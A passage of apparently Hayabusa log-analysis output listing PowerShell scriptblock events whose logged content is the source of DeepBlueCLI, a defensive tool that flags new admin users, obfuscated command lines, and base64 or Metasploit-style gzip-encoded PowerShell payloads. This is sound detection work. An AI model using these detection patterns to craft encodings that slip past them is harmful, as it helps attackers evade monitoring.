($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n""",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.127 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.127 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.127 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.127 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.130 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:44:35.136 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" 